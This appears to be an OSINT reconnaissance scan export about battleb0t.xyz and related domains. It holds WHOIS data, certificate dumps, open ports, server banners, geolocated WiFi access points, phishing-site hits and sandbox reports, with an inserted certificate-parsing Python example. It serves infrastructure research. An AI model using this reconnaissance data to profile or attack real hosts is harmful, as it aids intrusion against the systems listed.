Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS-1086.AWSDNS-07.ORG
Name Server: NS-2016.AWSDNS-60.CO.UK
Name Server: NS-222.AWSDNS-27.COM
Name Server: NS-854.AWSDNS-42.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain name: cloudwaysapps.com
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-06-22T11:27:03.11Z
Creation Date: 2012-01-04T12:17:34.00Z
Registrar Registration Expiration Date: 2028-01-04T12:17:34.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com
Name Server: ns-222.awsdns-27.com
Name Server: ns-854.awsdns-42.net
Name Server: ns-1086.awsdns-07.org
Name Server: ns-2016.awsdns-60.co.uk
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T06:41:09.59Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 02:57:23 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:37:42 | Physical Location | No | MetaDefender | 0 | 0 | 3 | 0 | None | Frankfurt Am Main, Germany | 45.131.109.53 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0.github.io | 185.199.111.153 |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 151
Connection: keep-alive
CF-RAY: 7c5b6bb0ea398702-ORD
| 188.114.97.1 |
| 2023-05-12 03:33:50 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | pHYs
iTXtXML:com.adobe.xmp
<xmp:CreatorTool>Adobe ImageReady</xmp:CreatorTool>
<tiff:Orientation>1</tiff:Orientation>
</rdf:Description>
</rdf:RDF>
</x:xmpmeta>
IDATx
zZrC
"6k!6
JlJQI
5.-q
_ y5b
HBT 7
h_'/o
"6a"B
3fL@rR
6L NR
$6qm.
vc0dj
p<N Q
8aS'_?G
Iz/S.
h'edI
8IRg\
UfnX'c
NjQX00B@
IVcM\
uTYkr
gjwus
HtHCj
q G9$
?J__YQy
USSS`
OBj c
'QOoL
GpyU7
ybe@ ?
QIZVg
O$MMMu
@.X0E
<5!`2E
?bczo
IlH0c
| https://fluid.battleb0t.xyz/gp_badge.png |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2082 | 188.114.97.1 |
| 2023-05-12 02:58:45 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0c:e3:f4:1c:e8:cb:bb:cf:13:f7:6c:6f:36:5e:c2:eb
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Feb 11 05:22:10 2023 GMT
Not After : May 12 05:22:09 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ce:18:28:ee:1e:4b:a0:54:f5:b2:a8:46:72:fa:
7a:1b:b5:83:d9:b7:b9:85:b6:7e:b8:27:ed:42:bb:
f5:8d:d9:0c:96:a1:ac:39:e8:ba:ac:6a:f9:9f:0d:
46:7d:1d:65:d4:56:4a:89:c7:ac:f3:42:0e:7d:79:
7a:b0:01:1a:1e:df:5a:64:96:92:41:7b:76:b3:71:
65:05:d4:d3:ac:cb:dd:ed:f6:10:2e:3d:94:bc:fe:
b8:5d:9b:af:1f:73:66:41:55:24:91:8f:6a:93:09:
c4:a9:4e:cc:3f:db:83:53:92:be:e5:79:63:d7:c0:
f2:ad:fb:15:4c:da:cf:26:0f:ae:09:13:32:5e:2f:
61:79:df:43:b7:2e:3e:7a:3f:f1:71:51:6a:d0:2c:
51:14:2b:e5:5a:3a:2a:63:a7:80:69:d6:dd:ff:21:
c9:3a:6c:59:b1:94:d7:a0:d6:e0:c5:59:62:0d:45:
33:fc:cc:08:f3:b9:08:a9:ea:24:98:5f:22:3c:5b:
51:7a:ef:2a:db:8c:ca:b6:bd:39:1c:ec:e9:76:19:
54:df:f7:38:11:32:20:7f:02:4a:bb:97:a7:34:fd:
a8:8b:36:ea:36:af:62:53:9d:78:4a:b7:98:3a:a9:
07:8f:74:9e:43:31:08:ab:be:62:c0:5e:01:ec:ce:
53:dd
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
F7:A7:5E:24:2E:1C:7A:7A:2A:90:36:DF:66:18:6B:A7:17:36:7E:3E
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/_NaLKSGSIEY
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/fXbrD094iyQ.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:bc:ea:b6:cf:53:d5:18:fa:35:01:f5:1a:84:b4:db:1b:35:
a8:21:d4:b0:1c:8c:61:d9:0a:ed:8a:98:0e:ec:59:d1:7e:8a:
57:4f:81:85:21:9d:81:17:a5:6d:50:b7:02:17:30:3f:51:39:
0f:0d:a8:d9:9c:3b:6f:9f:16:6b:f6:f6:71:30:1e:f6:cd:df:
76:28:c1:38:b4:2a:e8:d2:ce:d8:22:7a:dc:2b:32:d6:cb:47:
88:b5:09:84:fa:12:6c:6e:e0:35:16:bb:24:8c:97:ba:91:7e:
45:50:9e:95:dc:7b:ff:96:e1:f9:37:11:30:5c:89:2e:ed:a5:
42:7f:26:b7:5c:84:0f:5f:e0:da:f9:32:fa:e2:bd:aa:52:51:
70:cd:f0:79:e0:2d:8e:67:56:3c:ba:c2:1e:d9:2f:a6:4b:13:
8c:cf:70:85:8b:05:86:ea:ed:7a:8a:75:c4:87:c4:fc:b8:11:
72:8c:37:b1:f0:08:21:35:fa:6a:0a:a7:28:58:06:2e:4b:74:
11:70:1e:20:5f:d2:60:2c:f6:42:ca:fa:2c:6e:50:27:2a:ea:
bd:8f:2d:c2:66:e4:e3:0c:69:4a:0b:47:18:a2:29:2b:ca:35:
4e:52:e9:78:dd:08:a8:e2:6b:51:5d:78:d4:f2:8b:19:66:55:
d1:aa:21:f5
| ayhu.xyz |
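Three rows in this scan carry certificates in `openssl x509 -text` form (kekw.battleb0t.xyz, funny.battleb0t.xyz and *.ayhu.xyz). Two things an analyst should read off them before treating them as evidence. Every one of these dumps carries the critical `CT Precertificate Poison` extension, so they are precertificates pulled from Certificate Transparency logs, which a TLS client must reject (RFC 6962); they prove that a certificate was requested for the name, not that any host serves it. And validity has to be read against the scan date: the kekw.battleb0t.xyz certificate had expired almost two months before this scan, and the *.ayhu.xyz one expires on the scan day. The following is an added example, not part of the scan output and not SpiderFoot code: a parser that pulls the actionable fields out of such a dump and rates each certificate against the scan time. It assumes the scan's "Date Found" column is UTC, and the embedded dumps are trimmed copies of the three on this page with key material and signatures removed.

```python
import re
from datetime import datetime, timedelta, timezone

# Trimmed copies of the three openssl-style dumps in the scan rows above,
# with moduli and signatures removed (constructed excerpts).
KEKW = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Dec 18 21:24:59 2022 GMT
            Not After : Mar 18 21:24:58 2023 GMT
        Subject: CN=kekw.battleb0t.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (4096 bit)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:kekw.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""
FUNNY = """\
Certificate:
    Data:
        Issuer: C=US, O=Let's Encrypt, CN=R3
        Validity
            Not Before: Mar 15 23:40:10 2023 GMT
            Not After : Jun 13 23:40:09 2023 GMT
        Subject: CN=funny.battleb0t.xyz
        Subject Public Key Info:
            Public Key Algorithm: id-ecPublicKey
                Public-Key: (256 bit)
                NIST CURVE: P-256
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""
AYHU = """\
Certificate:
    Data:
        Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
        Validity
            Not Before: Feb 11 05:22:10 2023 GMT
            Not After : May 12 05:22:09 2023 GMT
        Subject: CN=*.ayhu.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
        X509v3 extensions:
            X509v3 Subject Alternative Name:
                DNS:*.ayhu.xyz, DNS:ayhu.xyz
            CT Precertificate Poison: critical
                NULL
"""

# Assumption: the scan's "Date Found" column is UTC. This is the timestamp of
# the *.ayhu.xyz row.
SCAN_TIME = datetime(2023, 5, 12, 2, 58, 45, tzinfo=timezone.utc)


def _field(text, label):
    """Value of a 'Label: value' line; tolerates the space openssl prints before the colon in 'Not After :'."""
    m = re.search(rf"^\s*{re.escape(label)}\s*:\s*(.+?)\s*$", text, re.M)
    return m.group(1) if m else None


def _when(s):
    """openssl prints 'Mon D HH:MM:SS YYYY GMT', with a doubled space before a single-digit day."""
    return datetime.strptime(" ".join(s.split()), "%b %d %H:%M:%S %Y GMT").replace(tzinfo=timezone.utc)


def parse_cert_text(text):
    """Pull the analyst-relevant fields out of an `openssl x509 -text` style dump."""
    san = re.search(r"Subject Alternative Name:\s*(DNS:[^\n]*)", text)
    bits = re.search(r"Public-Key: \((\d+) bit\)", text)
    return {
        "subject_cn": _field(text, "Subject").split("CN=", 1)[1],
        "issuer": _field(text, "Issuer"),
        "not_before": _when(_field(text, "Not Before")),
        "not_after": _when(_field(text, "Not After")),
        "key": f"{_field(text, 'Public Key Algorithm')} {bits.group(1) if bits else '?'}",
        "sans": [s.strip()[len("DNS:"):] for s in san.group(1).split(",")] if san else [],
        # RFC 6962: a critical poison extension marks a precertificate logged to CT.
        # TLS clients must reject it, so it says nothing about what the host serves.
        "is_precertificate": "CT Precertificate Poison" in text,
    }


def assess(cert, now=SCAN_TIME, soon=timedelta(days=1)):
    """Lifecycle status of a parsed certificate relative to the scan time."""
    if now >= cert["not_after"]:
        return "expired"
    if now < cert["not_before"]:
        return "not_yet_valid"
    if cert["not_after"] - now <= soon:
        return "expiring_soon"
    return "valid"


def summarize(dumps, now=SCAN_TIME):
    """(parsed cert, status) for each dump, in input order."""
    return [(c, assess(c, now)) for c in (parse_cert_text(d) for d in dumps)]


if __name__ == "__main__":
    for cert, status in summarize([KEKW, FUNNY, AYHU]):
        kind = "precert" if cert["is_precertificate"] else "leaf"
        print(f"{cert['subject_cn']:22} {status:14} {kind:8} {cert['key']:22} {', '.join(cert['sans'])}")
```

Run against the three dumps, the kekw.battleb0t.xyz entry comes back `expired`, funny.battleb0t.xyz `valid`, and *.ayhu.xyz `expiring_soon`, all three marked as precertificates. A CT hit on a name is a reason to probe the host for what it actually serves, not a substitute for doing so.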
| 2023-05-12 02:44:07 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | Varnish | battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | iTrack at Milbank (Net ID: 00:02:2D:2D:57:34) | 34.0544, -118.244 |
| 2023-05-12 02:51:45 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 25, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=a85668108cb3&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:3704:120:WilError_01"\n "SM0:3704:304:WilStaging_02"\n "Local\\SM0:3704:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:3704:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.122:443"\n "142.251.2.157:443"\n "151.101.0.176:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "142.251.46.164:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, 
u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir 
| 185.199.108.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | datezone (Category: XXXPORNXXX) https://www.datezone.com/users/login/ | login |
| 2023-05-12 02:55:15 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 165.232.113.85 |
| 2023-05-12 02:54:07 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:4700:3031::/48 | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Jacobson1 (Net ID: 00:09:5B:C6:54:54) | 39.0469, -77.4903 |
| 2023-05-12 02:54:51 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, 29418, United States, North America | 34.74.170.74 |
| 2023-05-12 03:33:50 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | pHYs tEXtSoftware ezgif.com IDATx tEXtComment | https://fluid.battleb0t.xyz/app_badge.png |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | devRant (Category: coding) https://devrant.com/users/login | login |
| 2023-05-12 02:54:48 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.148.97.127:80 | 34.148.97.127 |
| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 104.21.6.166 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MS54GURN (Net ID: 00:0D:3A:70:7B:09) | 39.0469, -77.4903 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00nave198.github.io] https://www.openphish.com/feed.txt | 00nave198.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 00:02:2D:05:7E:8A (Net ID: 00:02:2D:05:7E:8A) | 37.780462,-122.390564 |
| 2023-05-12 02:45:44 | Physical Coordinates | No | AbstractAPI | 43 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:50c0:8002::153 |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | jQuery CDN | funny.battleb0t.xyz |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 44 | 0 | 1 | 0 | None | www.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | VIGO (Net ID: 00:01:E3:4A:C7:EB) | 50.1188, 8.6843 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:77:9F:5D) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | fse2 (Net ID: 00:01:38:A0:A1:09) | 37.780462,-122.390564 |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c564d9c4d65692b-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 7717 7361 (Net ID: 00:00:C5:FC:FE:34) | 37.7813933,-122.3918002 |
| 2023-05-12 02:52:05 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | Hybrid Analysis sandbox report for https://hassan-gamall.github.io/netflix/ (environment 160, 17 processes, threat score 100, classification tag: phishing) | 185.199.108.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | tc (Net ID: 00:12:BF:FD:D7:70) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Maingau (Net ID: 00:02:2D:74:7A:73) | 50.1188, 8.6843 |
| 2023-05-12 02:52:45 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [35.229.48.116] https://www.virustotal.com/en/ip-address/35.229.48.116/information/ | 35.229.48.116 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | YILBEKKIMYA (Net ID: 00:02:CF:C6:17:D5) | 40.2024, 29.0398 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:26:98:C5) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.240): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | kids (Net ID: 00:0C:41:FC:94:E2) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:01:36:41:8C:04) | 50.1188, 8.6843 |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden; Server: cloudflare; Date: <REDACTED>; Content-Type: text/html; Content-Length: 151; Connection: keep-alive; CF-RAY: 7c5e6685bb0686ab-ORD | 188.114.96.1 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.96): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 1 | 0 | 2 | 0 | None | 001viet.com | 185.199.111.153 |
| 2023-05-12 02:44:35 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate: Version 3; Issuer: C=US, O=Let's Encrypt, CN=R3; Subject: CN=www.battleb0t.xyz; SAN: DNS:www.battleb0t.xyz; Not Before: Nov 17 13:22:44 2022 GMT; Not After: Feb 15 13:22:43 2023 GMT; RSA 2048-bit, sha256WithRSAEncryption; Key Usage: Digital Signature, Key Encipherment; Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication; CA:FALSE; OCSP: http://r3.o.lencr.org; CA Issuers: http://r3.i.lencr.org/; two CT precertificate SCTs (Nov 17 14:22:44 2022 GMT) | battleb0t.xyz |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.140): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Brandis Wifi 2GHz (Net ID: 00:01:9F:20:CA:50) | 34.0544, -118.244 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2087 | 104.21.6.166 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MainSurf (Net ID: 00:02:2D:8B:15:E0) | 50.1188, 8.6843 |
| 2023-05-12 02:55:21 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Ubuntu Linux | 207.154.228.169 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | CFS (Net ID: 00:18:39:0C:15:86) | 32.8608, -79.9746 |
| 2023-05-12 02:49:32 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | Hybrid Analysis sandbox report for a tracking link on url1021.joinpreventor.com (environment 100, 3 processes, no threat score, no classification tags; extracted URL http://app-mobile-link.ml rated suspicious; contacted domains url1021.joinpreventor.com and crt.usertrust.com) | 185.199.110.153 |
| 2023-05-12 02:54:20 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 200 | https://funny.battleb0t.xyz/gallery.css |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.207): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Vienna (Net ID: 00:09:5B:B1:9F:16) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:53:17 | IPv6 Address | No | Mnemonic PassiveDNS | 16 | 0 | 1 | 0 | None | 2a06:98c1:3120::1 | ayhu.xyz |
